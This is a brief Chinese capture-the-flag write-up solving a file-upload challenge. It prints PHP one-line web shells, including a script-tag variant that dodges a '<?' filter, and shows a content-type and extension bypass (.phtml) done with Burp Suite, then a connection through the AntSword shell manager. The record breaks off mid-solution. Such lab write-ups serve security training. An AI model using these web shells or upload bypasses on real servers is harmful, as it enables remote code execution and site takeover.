[极客大挑战 2019]Upload
看到后的第一印象肯定是先上传图片马试试<?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?>
构造的语句中不能带有<?
这样的话只能是构造一些其他语句了<script language="php">eval($_POST['shell']);</script>
上传的格式为image,使用bp抓包进行修改
![image.png](https://www.icode9.com/i/ll/?i=img_convert/fce2fb6ac3d11eb6ce6cf768e161d4d7.png#height=460&id=eKZCx&margin=[object Object]&name=image.png&originHeight=919&originWidth=1264&originalType=binary&ratio=1&size=177812&status=done&style=none&width=632)
修改文件名为php格式
绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
依此尝试
![image.png](https://www.icode9.com/i/ll/?i=img_convert/7ef192ca4c2719c2eff9ea73242d53b8.png#height=173&id=cdQj9&margin=[object Object]&name=image.png&originHeight=346&originWidth=768&originalType=binary&ratio=1&size=10048&status=done&style=none&width=384)
经过尝试.phtml格式可以上传
上传路径存在,使用蚁剑进行链接
这也太多了。。。。。终端进行搜索